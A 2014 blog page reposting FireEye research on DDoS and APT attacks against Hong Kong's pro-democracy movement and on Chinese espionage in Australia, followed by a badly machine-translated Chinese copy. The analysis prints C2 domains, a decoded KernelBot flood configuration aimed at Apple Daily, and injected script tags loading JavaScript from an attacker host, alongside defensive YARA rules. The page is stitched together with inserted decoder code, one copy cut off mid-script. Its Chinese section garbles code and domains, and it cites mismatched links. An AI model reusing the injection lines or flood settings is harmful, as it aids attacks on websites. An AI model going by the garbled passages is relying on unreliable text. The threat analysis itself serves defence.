2014年11月28日 星期五

From FireEye's security research reports: a warning to every country to guard its valuable business property and national intelligence carefully, when even a newspaper such as Apple Daily is being hit by DDoS attacks! (1) Operation Poisoned Handover: Unveiling Ties Between APT Activity in Hong Kong's Pro-Democracy Movement (November 3, 2014, by Ned Moran, Mike Oppenheim and Mike Scott; Threat Intelligence, Threat Research) - (2) Silencing Dissent via Cyber Suppression (November 3, 2014, by Tony Cole; Threat Intelligence, Threat Research) - (3) Double-edged Sword: Australia Economic Partnerships Under Attack from China (October 13, 2014; Threat Intelligence, Threat Research)






-**Please use Google Translate to read this page in the language of your own country or city ^^-


 http://www.fireeye.com/blog/technical/malware-research/2014/03/spear-phishing-the-news-cycle-apt-actors-leverage-interest-in-the-disappearance-of-malaysian-flight-mh-370.html

Operation Poisoned Handover: Unveiling Ties Between APT Activity in Hong Kong's Pro-Democracy Movement



 As the pro-democracy movement in Hong Kong has continued, we've been watching for indications of confrontation taking place in cyberspace. Protests began in September and have continued to escalate.
In recent weeks, attackers have launched a series of Distributed Denial of Service attacks (DDoS) against websites promoting democracy in Hong Kong. According to the Wall Street Journal, websites belonging to Next Media's Apple Daily publication have suffered from an ongoing DDoS attack that “brought down its email system for hours”. According to other reports, Next Media's network has suffered a “total failure” as a result of these attacks. Additionally, at least one member of the popular online forum HKGolden was arrested for posting messages encouraging support for the OccupyCentral Pro Democracy movement.
The use of DDoS attacks as a political tool during times of conflict is not new; patriotic hacktivist groups frequently use them as a means to stifle political activity of which they disapprove. The question of state sponsorship (or at least tacit approval) in online crackdowns is often up for debate and ambiguous from a technical evidence and tradecraft perspective.
In this case, however, we've discovered an overlap in the tools and infrastructure used by China-based advanced persistent threat (APT) actors and the DDoS attack activity. We believe that these DDoS attacks are linked to previously observed APT activity, including Operation Poisoned Hurricane. This correlation sheds light on the potential relationships, symbiosis and tool sharing between patriotic hacker activities designed to disrupt anti-government activists in China, and the APT activity we consistently see that is more IP theft and espionage-focused.
 

Ongoing DDoS Attacks Target the Pro-Democracy Movement

FireEye has identified a number of binaries coded to receive instructions from a set of command and control (C2) servers instructing participating bots to attack Next Media-owned websites and the HKGolden forum. Next Media is a large media company in Hong Kong and the HKGolden forum has been used as a platform to organize pro-democracy protests. Each sample we identified is signed with digital certificates that have also been used by APT actors to sign binaries in previous intrusion operations. (Table: MD5 hash and signing certificate for each sample.)
These binaries are W32 Cabinet self-extracting files that drop a variant of an older DDoS tool known as KernelBot. All of the samples we identified have the “NewVersion” value 20140926. Structurally, all of these samples are similar in that they drop three files:
• ctfmon.exe – a legitimate, signed copy of the Pidgin IM client (MD5 hash 1685f978149d7ba8e039af9a4d5803c7)
• libssp-0.dll – malware DLL which is side-loaded by ctfmon.exe to decode and launch KernelBot. Most versions of this DLL are also signed by either the QTI or CallTogether certificate.
• readme.txt – a binary file which contains the XOR-encoded KernelBot DLL as well as C2 destination information (most have MD5 hash b5ac964a74091d54e091e68cecd5b532)
The KernelBot implants receive targeting instructions from C2 servers hard-coded directly into the sample. For example, c3d6450075d618b1edba17ee723eb3ca drops a KernelBot variant that connects to both www.sapporo-digital-photoclub[.]com and wakayamasatei[.]com. The full list of C2 servers we identified is as follows:
sapporo-digital-photoclub[.]com
wakayamasatei[.]com
tommo[.]jp
mizma.co[.]jp
sp.you-maga[.]com
nitori-tour[.]com
ninekobe[.]com
shinzenho[.]jp
wizapply[.]com
www.credo-biz[.]com
On Oct. 21, the control server at wakayamasatei[.]com responded with the following encoded configuration file:
@$@cWFPWERPRnlPXl5DRE13JyBjWXhPWkVYXnleS15PFxonIGNZbkVdRGxDRk94X0QaFxonIGlHTmNuGhcbJyBuRV1EbENGT3hfRH9YRhoXQl5eWhAFBRsaBBo…@$@
This configuration file can be decoded by stripping the leading and trailing @$@ characters. At this point, a simple base64 and XOR decode will reveal the plaintext configuration. The following snippet of python code can be used to decode this command:
import base64

XOR_key = 0x2A  # single-byte key; 0x7E has also been observed in this campaign

b64encoded = request.content.strip(b"@$@")   # drop the leading and trailing @$@ delimiters
b64decoded = base64.b64decode(b64encoded)     # undo the base64 layer
# undo the single-byte XOR layer to recover the plaintext INI configuration
command = "".join(chr(c ^ XOR_key) for c in b64decoded)
FireEye has observed two different single-byte XOR keys used to encode configuration files issued by the DDoS C2 servers in this campaign: 0x2A and 0x7E. The encoded configuration file shown above decodes to:
[KernelSetting]
IsReportState=0
IsDownFileRun0=0
CmdID0=1
DownFileRunUrl0=http://10.0.1.151/1.exe
[UpdateServer]
NewVersion=20140926
UpdateFileUrl=http://10.0.1.151/1.exe
[DDOS_HostStatistics]
CountUrl=
Timer=2
[DDOS_ScriptFlood]
IsScriptFlood=1
CmdID=123
ScriptFloodDNS=
ScriptFloodUrl=http://nxapi.appledaily.com.hk/
ScriptFloodPort=80
IsGetUrlFile=1
IsSendPacket=0
ThreadLoopTime=5
ThreadCount=10
Timer=360
IsTimer=1
[DDOS_ScriptFlood_A1]
IsScriptFlood=0
CmdID=1
ScriptFloodDNS=10.0.1.151
ScriptFloodUrl=10.0.1.151/1.html
ScriptFloodPort=80
IsGetUrlFile=1
IsSendPacket=1
ThreadLoopTime=1
ThreadCount=1
Timer=20
IsTimer=1
[DDOS_UdpFlood]
IsUdpFlood=0
CmdID=1
UdpFloodDNS=10.0.1.151
ThreadCount=1
Timer=20
IsTimer=1
[DDOS_UdpFlood_A1]
IsUdpFlood=0
CmdID=1
UdpFloodDNS=10.0.1.151
ThreadCount=1
Timer=20
IsTimer=1
[DDOS_SynFlood]
IsSynFlood=0
CmdID=1
SynFloodDNS=10.0.1.151
SynFloodPort=80
ThreadCount=1
Timer=20
IsTimer=1
[DDOS_TcpFlood]
IsTcpFlood=0
CmdID=1
TcpFloodDNS=10.0.1.151
TcpFloodPort=80
IsSendPacket=1
ThreadCount=1
Timer=20
IsTimer=1
[DDOS_TcpFlood_A1]
IsTcpFlood=0
CmdID=1
TcpFloodDNS=10.0.1.151
TcpFloodPort=80
IsSendPacket=1
ThreadCount=6
Timer=20
IsTimer=1
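As an added worked example (not code from the FireEye post), the decoder below applies the three steps described above (strip the @$@ delimiters, base64-decode, single-byte XOR), tries both keys the post reports (0x2A and 0x7E) and keeps the one that yields a configuration starting with [KernelSetting], then parses the INI and lists which flood sections are switched on and what they target. It checks itself against the first 44 base64 characters of the Oct. 21 response quoted above and against a constructed response encoded with the 0x7E key; target.example is a placeholder, not a real target.

```python
import base64
import configparser

# The two single-byte XOR keys FireEye observed on the KernelBot C2 servers.
KNOWN_XOR_KEYS = (0x2A, 0x7E)
DELIM = b"@$@"


def decode_kernelbot_config(payload, keys=KNOWN_XOR_KEYS):
    """Strip the @$@ delimiters, base64-decode, then try each single-byte XOR key.
    A genuine KernelBot configuration is an INI file that starts with [KernelSetting],
    which is the check used to select the key. Returns (key, plaintext)."""
    body = payload.strip()
    if body.startswith(DELIM):
        body = body[len(DELIM):]
    if body.endswith(DELIM):
        body = body[:-len(DELIM)]
    raw = base64.b64decode(body)
    for key in keys:
        text = bytes(b ^ key for b in raw).decode("latin-1")
        if text.startswith("[KernelSetting]"):
            return key, text
    raise ValueError("no known XOR key yields a KernelBot configuration")


def active_floods(ini_text):
    """List the DDOS_* flood sections that are switched on (Is<Kind>Flood=1) together
    with their target, thread count and timer, so an analyst can read a captured C2
    response at a glance and check whether any of their own assets are named."""
    cp = configparser.ConfigParser(interpolation=None, delimiters=("=",))
    cp.optionxform = str  # keep option names exactly as the bot writes them
    cp.read_string(ini_text.replace("\r\n", "\n"))
    floods = []
    for section in cp.sections():
        if not section.startswith("DDOS_") or "Flood" not in section:
            continue
        kind = section[len("DDOS_"):].split("_")[0]  # e.g. ScriptFlood, UdpFlood
        if cp.get(section, "Is" + kind, fallback="0") != "1":
            continue
        target = (cp.get(section, kind + "Url", fallback="")
                  or cp.get(section, kind + "DNS", fallback=""))
        floods.append({
            "section": section,
            "type": kind,
            "target": target,
            "threads": int(cp.get(section, "ThreadCount", fallback="0")),
            "timer": int(cp.get(section, "Timer", fallback="0")),
        })
    return floods


def encode_kernelbot_config(ini_text, key):
    """Inverse operation (XOR, base64, @$@ wrapping); used here only to build a
    constructed response in the same shape as the real ones, to test the decoder."""
    raw = bytes(b ^ key for b in ini_text.encode("latin-1"))
    return DELIM + base64.b64encode(raw) + DELIM


# First 44 base64 characters of the Oct. 21 response quoted in the post (key 0x2A).
REAL_PREFIX = b"@$@cWFPWERPRnlPXl5DRE13JyBjWXhPWkVYXnleS15PFxon@$@"

# Constructed sample configuration (same layout as the decoded file in the post;
# target.example is a placeholder), encoded with the other observed key, 0x7E.
SAMPLE_INI = (
    "[KernelSetting]\r\nIsReportState=0\r\n"
    "[UpdateServer]\r\nNewVersion=20140926\r\n"
    "[DDOS_ScriptFlood]\r\nIsScriptFlood=1\r\nCmdID=123\r\nScriptFloodDNS=\r\n"
    "ScriptFloodUrl=http://target.example/\r\nScriptFloodPort=80\r\n"
    "ThreadCount=10\r\nTimer=360\r\nIsTimer=1\r\n"
    "[DDOS_UdpFlood]\r\nIsUdpFlood=0\r\nCmdID=1\r\nUdpFloodDNS=10.0.1.151\r\n"
    "ThreadCount=1\r\nTimer=20\r\nIsTimer=1\r\n"
)
SAMPLE_RESPONSE = encode_kernelbot_config(SAMPLE_INI, 0x7E)

if __name__ == "__main__":
    key, text = decode_kernelbot_config(REAL_PREFIX)
    print(hex(key), repr(text))          # 0x2a '[KernelSetting]\r\nIsReportState=0\r'
    key, text = decode_kernelbot_config(SAMPLE_RESPONSE)
    print(hex(key))                      # 0x7e
    for flood in active_floods(text):
        print(flood)                     # only the ScriptFlood section is enabled
```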
During the course of our research, we've observed more than 30 different unique configuration files issued by the C2 servers listed above. These configurations issued commands to attack the following domains and IPs:
nxapi.appledaily.com[.]hk
202.85.162.90
58.64.139.10
202.85.162.97
202.85.162.81
198.41.222.6
202.85.162.101
202.85.162.95
202.85.162.180
202.85.162.140
202.85.162.130
124.217.214.149
All of the above IPs host Next Media or Apple Daily websites, with the exception of 58.64.139.10 and 124.217.214.149. The IP 58.64.139.10 has hosted hkgolden[.]com, the domain for the HKGolden forum mentioned above.
For approximately 14 hours between October 23rd and 24th, the attackers pushed a configuration update to four control servers that instructed bots under their control to flood 124.217.214.149 with UDP traffic. The IP 124.217.214.149 hosted the attacker-controlled domain p.java-sec[.]com.
On Oct. 23, 2014, two of the active control servers began instructing participating bots to cease attacks. By Oct. 24, 2014, all five of the known active control servers were issuing commands to cease the attacks.
It should come as no surprise that hkgolden[.]com, nextmedia[.]com, and appledaily.com[.]hk websites are now or previously have been blocked by the Great Firewall of China – indicating that the PRC has found the content hosted on these sites objectionable.

Links to Previous Activity

The most direct connection between these DDoS attacks and previous APT activity is the use of the QTI International and CallTogether code signing certificates, which we have seen in malware attributed to APT activity.
The QTI International digital certificate has been previously used to sign binaries used in APT activity including Operation Poisoned Hurricane. Specifically, 17bc9d2a640da75db6cbb66e5898feb1 is a PlugX variant signed by the QTI International certificate. This PlugX variant connected to a Google Code project at code.google[.]com/p/udom/, where it decoded a command that configured its C2 server.
The sample 0b54ae49fd5a841970b98a078968cb6b was signed with the QTI International certificate as well. This sample was first observed during a drive-by attack in June 2014, and was downloaded from java-se[.]com/jp.jpg. This sample is detected as Backdoor.APT.Preshin and connected to luxscena[.]com for C2.
The QTI International certificate was also used to sign e2a4b96cce9de4fb126cfd5f5c73c3ed. We detect this payload as Backdoor.APT.PISCES and it used hk.java-se[.]com for C2. The java-se[.]com website was previously used in other attacks targeting the pro-democracy movement in Hong Kong. We first observed malicious JavaScript inserted into the website of the Hong Kong Association for Democracy and People's Livelihood on June 26, 2014, which appeared as follows:
<a href="http://www.adpl.org.hk/?p=2680" title="抗議九巴加價要求凍結加價、改善服務 <script language=javascript src=http://java-se.com/o.js></script>">
More recently, as noted by Claudio Guarnieri, the website of the Democratic Party of Hong Kong was seen hosting a redirect to the same malicious javascript.
The CallTogether certificate has been used to sign ecf21054ab515946a812d1aa5c408ca5. We also detect this payload as Backdoor.APT.PISCES and observed it connect to u.java-se[.]com.
Both of these certificates are valid but can be detected and blocked via the following Yara signatures:
rule callTogether_certificate
{
    meta:
        author = "Fireeye Labs"
        version = "1.0"
        reference_hash = "d08e038d318b94764d199d7a85047637"
        description = "detects binaries signed with the CallTogether certificate"
    strings:
        $serial = { 45 21 56 C3 B3 FB 01 76 36 5B DB 5B 77 15 BC 4C }
        $o = "CallTogether, Inc."
    condition:
        $serial and $o
}

rule qti_certificate
{
    meta:
        author = "Fireeye Labs"
        reference_hash = "cfa3e3471430a0096a4e7ea2e3da6195"
        description = "detects binaries signed with the QTI International Inc certificate"
    strings:
        $cn = "QTI International Inc"
        $serial = { 2e df b9 fd cf a0 0c cb 5a b0 09 ee 3a db 97 b9 }
    condition:
        $cn and $serial
}
These ongoing DDoS attacks and previous APT intrusion activity both target the hkgolden[.]com website. As noted above, this site has been targeted with a DDoS attack by a KernelBot network. We also found that the hkgolden[.]com website was compromised on Sept. 5, 2014 and had a redirect to malicious JavaScript, again hosted on another java-se[.]com host, which appeared as follows:
document.write("<script language=javascript src=http://jre76.java-se.com/js/rss.js></script>");
Finally, as noted above, the IP 124.217.214.149 was seen hosting the domain p.java-sec[.]com between Oct. 25, 2014 and Oct. 27, 2014. As Brandon Dixon noted, the java-sec[.]com domain is linked to java-se[.]com by shared hosting history at the following IP addresses:
124.248.237.26
223.29.248.9
211.233.89.182
112.175.143.2
112.175.143.9
It is unclear why these actors would attack an IP address they were actively using. It's possible that the attackers wanted to test their botnet's capability by attacking an IP they were using to gather statistics on the size of the attack. It is also possible that the attackers simply made a mistake and accidentally issued commands to attack their own infrastructure. On Oct. 24, 2014, after attacking their own infrastructure, the attackers issued new instructions to their botnet that ceased all attacks.

Conclusion

While not conclusive, the evidence presented above shows a link between confirmed APT activity and ongoing DDoS attacks that appear to be designed to silence the pro-democracy movement in Hong Kong. The evidence does not conclusively prove that the same actors responsible for the DDoS attacks are also behind the observed intrusion activity discussed above, such as Operation Poisoned Hurricane. Rather, the evidence may indicate that a common quartermaster supports both the DDoS attacks and ongoing intrusion activity.
In either scenario, there is a clear connection between the intrusion activity documented in Operation Poisoned Hurricane and the DDOS attacks documented here. While the tactics of these activities are very different from a technical perspective, each supports distinct political objectives. Operation Poisoned Hurricane's objective appeared to have in part been IP theft possibly for economic gain or other competitive advantages. In the DDOS attacks, the objective was to silence free speech and suppress the pro democracy movement in Hong Kong. The Chinese government is the entity most likely to be interested in achieving both of these objectives.



 =====================================================
  http://www.fireeye.com/blog/technical/malware-research/2014/03/spear-phishing-the-news-cycle-apt-actors-leverage-interest-in-the-disappearance-of-malaysian-flight-mh-370.html

Silencing Dissent via Cyber Suppression


 Today, our Labs team released a blog called 'Operation Poisoned Handover: Unveiling Ties Between APT Activity in Hong Kong's Pro-Democracy Movement.' Clearly, the Chinese government has identified social media and uncontrolled information as a major threat. The linkage between probable Chinese hackers responsible for a number of Advanced Persistent Threat (APT) attacks around intellectual property theft and the ongoing Distributed Denial of Service attacks against the Pro Democracy movement in Hong Kong makes sense. The Chinese government is utilizing their deep hacking expertise garnered to shut down any online systems hosting information pertaining to and supporting the Pro-Democracy Movement in Hong Kong. All the while, they continue to shut down Social Media via the Great FireWall of China and thereby limit access to information on the Internet.
Unrestricted access to social media allows for the instantaneous spread of information, new concepts and, most importantly, unrest. The most notable example is the Arab Spring, which began on December 18th and quickly spread via social media, causing protests and uprisings that reverberated around the region. By the end of 2013, numerous rulers had been forced from power in the Middle East. It was a powerful tool for protesters to use to organize and publicly let the world know what their government was doing to silence them.
Most governments typically don't like widespread dissent. It makes running a country more difficult when a significant percentage of the population isn't happy with specific policies or practices that make the current ruling party look bad to the rest of the world. In a free and open society dissent is much more accepted and practiced openly and usually receives a lot of press and the government has no choice but to accept it. In a closed society where dissent is either not allowed or closely controlled, the media is the enemy during a protest since the government does not want the world to see any unrest and they don't want it known across their country lest the trouble spread. This is why the general population has limited access to online information except for what the government wants them to see. And with the DDoS revelations today, we see how governments not just block access but go a step further to keep the status quo in place.


 =======================================================
 http://www.fireeye.com/blog/technical/malware-research/2014/03/spear-phishing-the-news-cycle-apt-actors-leverage-interest-in-the-disappearance-of-malaysian-flight-mh-370.html

Double-edged Sword: Australia Economic Partnerships Under Attack from China


 During a visit in mid-September, China's Foreign Minister Wang Yi urged Australia to become “a bridge between east and west.” He was Down Under to discuss progress on the free trade agreement between Australia and China that seems likely by the end of the year. His comment referred to furthering the trade relationship between the two countries, but he might as well have been referring to hackers who hope to use the deepening alliance to steal information.
The Australian Financial Review (AFR) did an in-depth article with FireEye regarding Chinese attacks against Australian businesses, and this blog provides additional context.
Australia has experienced unprecedented trade growth with China over the last decade, which has created a double-edged sword. As Australian businesses partner with Chinese firms, Chinese-based threat actors increasingly launch sophisticated and targeted network attacks to obtain confidential information from Australian businesses. In the US and Europe, Chinese attacks on government and private industry have become a routine in local newspapers. Australia, it seems, is the next target.
The Numbers
First, let's review the state of Australian and Chinese economic interdependence. Averaging an annual 9.10% GDP growth rate over the last two decades, China's unparalleled economic expansion has protected Australia from the worst effects of the global financial crisis. Exports to China have increased tenfold, from $8.3b USD in 2001 to $90b USD in 2013[i], with the most prominent commodities being iron ore and natural gas. Much of these resources originate in Australia, which puts China's government under significant pressure to meet the skyrocketing demand for them. Despite the ever-increasing co-dependence Australia and China share as regional partners, Chinese authorities are likely supporting greater levels of monitoring and intelligence gathering from the Australian economy, often conducted through Chinese State-Owned Enterprises (SOEs) with domestic relationships in Australia.
SOE direct investment into Australia grew to 84% of all foreign investment inflows from China in 2014, primarily directed into the Australian mining and resource sector; demonstrating a further signal for control as China seeks to capture a level of certainty in catering for its future internal growth. We suspect this to be government-commissioned cyber threat actors targeting Australian firms with a specific agenda: to gain advantage and control of assets both in physical infrastructure and intellectual property.
Figure 1. Chinese Direct Investment into Australia by industry
The Impacts
How have these partnerships impacted Australian networks? Mandiant has observed the strategic operations of Chinese threat actors targeting companies involved in key economic sectors, including data theft from an Australian firm. Chinese Advanced Persistent Threats (APTs) are likely interested in compromising Australian mining and natural resources firms, especially after spikes in commodity prices. The upward trend in APT attacks from China is also aimed toward the third parties in the mining and natural resources ecosystems. Mandiant believes there has been a significant increase in China-based APT intrusions focused on law firms that hold confidential mergers and acquisitions information and sensitive intellectual property. It is no coincidence that these third-party firms are often found lacking in network protections. The investigation also found that, at the time of compromise, the majority of victim firms were in direct negotiations with Chinese enterprises, highlighting attempts by the Chinese government to gain advantage in targeted areas.
Due to its endemic pollution problems, clean energy has evolved into a critical industry for China. The country has now engaged a plan to develop Strategic Emerging Industries (SEIs) to address this. Australian intellectual property and R&D have become prime data, and has taken a major position in Chinese APT campaigns. Again, it is the third parties like law firms that are coming under attack.
Furthermore, to reduce China's reliance on Australian iron ore exports, Beijing has initiated a plan to develop an efficient, high-end steel production vertical through strategic acquisitions in Australia and by intervening to prevent unfavorable alliances. For example, the SOE Chinalco bought into Australian mining companies, presumably to prevent a merger that would have disadvantaged its interests. Clearly, the confidential business information of Australian export partners to China is becoming increasingly sought after.
Mandiant found that the majority of compromised firms had either current negotiation with Chinese enterprises or previous business engagements with Chinese enterprises. These attacks will persist as trade and investment grows, though they will do so at the cost of confidential Australian business information such as R&D and intellectual property. As large Australian mining and resources firms themselves may partner with the Australian Signals Directorate for security, the focus of the threat actors shifts to associated parties with access to sensitive data, who may not be pursuing partnerships with the Australian Signals Directorate. This calls for greater awareness and protection against the increasingly determined and advanced attacks launched.
The Bottom Line
Although this blog focuses on acts against large Australian mining and resources sectors, Mandiant has observed these APT actors often focusing their attention on other sectors such as defence, telecommunications, agriculture, political organizations, high technology, transportation, and aerospace, among others. But the broader lesson and message—drawing from US and European experience with Chinese attacks—is that no one is or will be exempt. For all Australian businesses and governments, it's time to fortify defences for a new era of cyber security.
[i] Australian Government Department of Foreign Trade and Affairs. www.dfat.gov.au/publications/stats-pubs/australiasexports-


 ===============================================================
  http://www.fireeye.com/blog/technical/malware-research/2014/03/spear-phishing-the-news-cycle-apt-actors-leverage-interest-in-the-disappearance-of-malaysian-flight-mh-370.html

操作中毒切換:APT之間的揭幕活動的關係,香港的民運


 作為香港的民運一直在繼續,我們也一直在關注的跡象對抗發生在網絡空間。 抗議活動開始於九月繼續升級。
在最近幾週,攻擊者已經推出了一系列分佈式拒絕服務攻擊(DDoS)攻擊對網站推廣香港的民主。 根據華爾街日報,屬於壹傳媒的蘋果日報出版的網站都遭受了持續的DDoS攻擊是“打倒了幾個小時的電子郵件系統”。 另據報導,壹傳媒的網絡已經遭遇了“徹底失敗”作為這些攻擊的結果。 此外,流行的在線論壇HKGolden至少有一名成員涉嫌發布消息鼓勵了OccupyCentral臨民主運動的支持。
利用DDoS攻擊作為在衝突時期的政治工具是不是新的; 愛國黑客行動主義團體經常利用它們作為一種手段來扼殺它,他們不贊成政治活動。 國家贊助(或至少是默許),在網上鎮壓的問題往往是為辯論而曖昧從技術證據和諜報觀點。
在這種情況下,但是,我們已經發現在使用中國的高級持續性威脅(APT)的演員和DDoS攻擊活動的工具和基礎架構的重疊。 我們相信,這些DDoS攻擊都與以前觀察到的APT活動,包括操作中毒颶風。 這種相關性揭示了旨在破壞反政府活動人士在中國愛國黑客活動之間的潛在關係,共生和工具共享輕,我們始終看到APT活動更加IP盜竊和間諜行為為重點。

正在進行的DDoS攻擊目標的民運

FireEye已經確定了一些二進制編碼,從一組指揮和控制(C2)服務器指示參與機器人攻擊壹傳媒擁有網站和HKGolden論壇收到指令。 壹傳媒是一家大型媒體公司在香港和HkGolden論壇已被用作一個平台,組織親民主抗議活動。 每個我們確定樣品與也被用來通過APT參與者登錄先前侵入操作二進制數字證書簽名的: MD5哈希
這些二進制文件是下降的舊DDoS攻擊工具被稱為KernelBot變種W32內閣自解壓文件。 我們所確定的樣本有20140926.的“動態網頁”的值在結構上,這些樣品是相似的,他們砸三個文件:
  •Ctfmon.exe會-一洋涇浜的IM客戶端的合法簽署的副本   (MD5哈希= 1685f978149d7ba8e039af9a4d5803c7) 
•libssp-0.dll惡意DLL是側面裝載了CTFMON.EXE
解碼和啟動KernelBot。 在大多數版本的此DLL也
不論是由QTI或CallTogether證書簽名。
•自述 - 一個二進制文件,其中包含的異或編碼
KernelBot DLL以及C2目的地信息(最有
b5ac964a74091d54e091e68cecd5b532的MD5哈希值)
所述KernelBot植入接收靶向選自C 2服務器直接硬編碼到樣品的說明。 例如,c3d6450075d618b1edba17ee723eb3ca滴KernelBot變體連接到這兩個www.sapporo-數字photoclub [。]玉米和wakayamasatei [。]玉米。 是C2服務器,我們確定的名單如下:
 札幌數字photoclub [。]玉米   wakayamasatei [。]玉米 
tommo [。] JP
mizma.co [。] JP
sp.you-馬夾[。]玉米
NITORI遊[。]玉米
ninekobe [。]玉米
shinzenho [。] JP
wizapply [。]玉米
www.credo-BIZ [。]玉米
[] 10月21日,在wakayamasatei控制服務器COM回應以下編碼配置文件:
  @ $ @ cWFPWERPRnlPXl5DRE13JyBjWXhPWkVYXnleS15PFxonIGNZbkVdRGxDRk   94X0QaFxonIGlHTmNuGhcbJyBuRV1EbENGT3hfRH9YRhoXQl5eWhAFBRsaBBo 
EGwQbHxsFGwRPUk8nIHF / Wk5LXk95T1hcT1h3JyBkT118T1hZQ0VEFxgaGx4
aExgcJyB / Wk5LXk9sQ0ZPf1hGF0JeXloQBQUbGgQaBBsEGx8bBRsET1JPJyBx
bm5leXViRVleeV5LXkNZXkNJWXcnIGlFX0Ref1hGFycgfkNHT1gXGCcgcW5uZ
Xl1eUlYQ1pebEZFRU53JyBjWXlJWENaXmxGRUVOFxsnIGlHTmNuFxsYGScgeU
lYQ1pebEZFRU5uZHkXJyB5SVhDWl5sRkVFTn9YRhdCXl5aEAUFRFJLWkMES1p
aRk9OS0NGUwRJRUcEQkEFJyB5SVhDWl5sRkVFTnpFWF4XEhonIGNZbU9ef1hG
bENGTxcbJyBjWXlPRE56S0lBT14XGicgfkJYT0tOZkVFWn5DR08XHycgfkJYT
0tOaUVfRF4XGxonIH5DR09YFxkcGicgY1l + Q0dPWBcbJyBxbm5leXV5SVhDWl
5sRkVFTnVrG3cnIGNZeUlYQ1pebEZFRU4XGicgaUdOY24XGycgeUlYQ1pebEZ
FRU5uZHkXGxoEGgQbBBsfGycgeUlYQ1pebEZFRU5 / WEYXGxoEGgQbBBsfGwUb
BEJeR0YnIHlJWENaXmxGRUVOekVYXhcSGicgY1ltT15 / WEZsQ0ZPFxsnIGNZe
U9ETnpLSUFPXhcbJyB + QlhPS05mRUVafkNHTxcbJyB + QlhPS05pRV9EXhcbJy
B + Q0dPWBcYGicgY1l + Q0dPWBcbJyBxbm5leXV / TlpsRkVFTncnIGNZf05abEZ
FRU4XGicgaUdOY24XGycgf05abEZFRU5uZHkXGxoEGgQbBBsfGycgfkJYT0tO
aUVfRF4XGycgfkNHT1gXGBonIGNZfkNHT1gXGycgcW5uZXl1f05abEZFRU51a
xt3JyBjWX9OWmxGRUVOFxonIGlHTmNuFxsnIH9OWmxGRUVObmR5FxsaBBoEGw
QbHxsnIH5CWE9LTmlFX0ReFxsnIH5DR09YFxgaJyBjWX5DR09YFxsnIHFubmV
5dXlTRGxGRUVOdycgY1l5U0RsRkVFThcaJyBpR05jbhcbJyB5U0RsRkVFTm5k
eRcbGgQaBBsEGx8bJyB5U0RsRkVFTnpFWF4XEhonIH5CWE9LTmlFX0ReFxsnI
H5DR09YFxgaJyBjWX5DR09YFxsnIHFubmV5dX5JWmxGRUVOdycgY1l + SVpsRk
VFThcaJyBpR05jbhcbJyB + SVpsRkVFTm5keRcbGgQaBBsEGx8bJyB + SVpsRkV
FTnpFWF4XEhonIGNZeU9ETnpLSUFPXhcbJyB + QlhPS05pRV9EXhcbJyB + Q0dP
WBcYGicgY1l + Q0dPWBcbJyBxbm5leXV + SVpsRkVFTnVrG3cnIGNZfklabEZFR
U4XGicgaUdOY24XGycgfklabEZFRU5uZHkXGxoEGgQbBBsfGycgfklabEZFRU
56RVheFxIaJyBjWXlPRE56S0lBT14XGycgfkJYT0tOaUVfRF4XHCcgfkNHT1g
XGBonIGNZfkNHT1gXGycg @ $ @
該配置文件可以通過汽提前和後@ $ @字符進行解碼。 在這一點上,一個簡單的base64和XOR譯碼將揭示明文配置。 Python代碼下面的代碼片段可用於解碼此命令:
  b64encoded = request.content.rstrip(“@ $ @”)。lstrip(“@ $ @”)   b64decoded = b64encoded.decode(“BASE64”) 
命令=“”
對於C在b64decoded:
X = ORD(三)
X = X ^ XOR_key
命令+ = CHR(X)
FireEye已經發現用於在這項運動的DDOS C2服務器發出的配置文件進行編碼兩種不同的單字節XOR鍵。 這兩種不同的鍵是0x2A或0x7E的。 上面所示的編碼配置文件進行解碼,以:
    [KernelSetting]
    IsReportState = 0
    IsDownFileRun0 = 0
    CmdID0 = 1
    DownFileRunUrl0 = http://10.0.1.151/1.exe
    [UpdateServer]
    動態網頁 = 20140926
    UpdateFileUrl = http://10.0.1.151/1.exe
    [DDOS_HostStatistics]
    CountUrl =
    Timer = 2
    [DDOS_ScriptFlood]
    IsScriptFlood = 1
    CmdID = 123
    ScriptFloodDNS =
    ScriptFloodUrl = http://nxapi.appledaily.com.hk/
    ScriptFloodPort = 80
    IsGetUrlFile = 1
    IsSendPacket = 0
    ThreadLoopTime = 5
    經緯 = 10
    Timer = 360
    IsTimer = 1
    [DDOS_ScriptFlood_A1]
    IsScriptFlood = 0
    CmdID = 1
    ScriptFloodDNS = 10.0.1.151
    ScriptFloodUrl = 10.0.1.151/1.html
    ScriptFloodPort = 80
    IsGetUrlFile = 1
    IsSendPacket = 1
    ThreadLoopTime = 1
    經緯 = 1
    Timer = 20
    IsTimer = 1
    [DDOS_UdpFlood]
    IsUdpFlood = 0
    CmdID = 1
    UdpFloodDNS = 10.0.1.151
    經緯 = 1
    Timer = 20
    IsTimer = 1
    [DDOS_UdpFlood_A1]
    IsUdpFlood = 0
    CmdID = 1
    UdpFloodDNS = 10.0.1.151
    經緯 = 1
    Timer = 20
    IsTimer = 1
    [DDOS_SynFlood]
    IsSynFlood = 0
    CmdID = 1
    SynFloodDNS = 10.0.1.151
    SynFloodPort = 80
    經緯 = 1
    Timer = 20
    IsTimer = 1
    [DDOS_TcpFlood]
    IsTcpFlood = 0
    CmdID = 1
    TcpFloodDNS = 10.0.1.151
    TcpFloodPort = 80
    IsSendPacket = 1
    經緯 = 1
    Timer = 20
    IsTimer = 1
    [DDOS_TcpFlood_A1]
    IsTcpFlood = 0
    CmdID = 1
    TcpFloodDNS = 10.0.1.151
    TcpFloodPort = 80
    IsSendPacket = 1
    經緯 = 6
    Timer = 20
    IsTimer = 1
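The decoding steps described above (strip the @$@ delimiters, base64-decode, XOR with a single byte) and the INI layout of the resulting configuration together make a small analysis tool possible: given a captured C2 response, try both published keys, keep the one that yields a readable INI, and pull out which flood sections are switched on and what they point at. The code below is an added example written for this page, not FireEye's code and not the bot's. The sample configuration, the function names and the placeholder target (target.example, 10.0.0.1) are constructed for the demonstration; only the two key values and the delimiter come from the text.

```python
import base64
import configparser
import string

# The two single-byte XOR keys FireEye reported for this campaign's C2 responses.
KNOWN_XOR_KEYS = (0x2A, 0x7E)
DELIM = b"@$@"

# Constructed sample in the KernelBot INI layout shown above. The values are
# placeholders (reserved example name / private address), not real targets.
SAMPLE_CONFIG = (
    "[KernelSetting]\r\n"
    "IsReportState = 0\r\n"
    "[DDOS_HostStatistics]\r\n"
    "CountUrl =\r\n"
    "Timer = 2\r\n"
    "[DDOS_ScriptFlood]\r\n"
    "IsScriptFlood = 1\r\n"
    "CmdID = 123\r\n"
    "ScriptFloodDNS =\r\n"
    "ScriptFloodUrl = http://target.example/\r\n"
    "ScriptFloodPort = 80\r\n"
    "Timer = 360\r\n"
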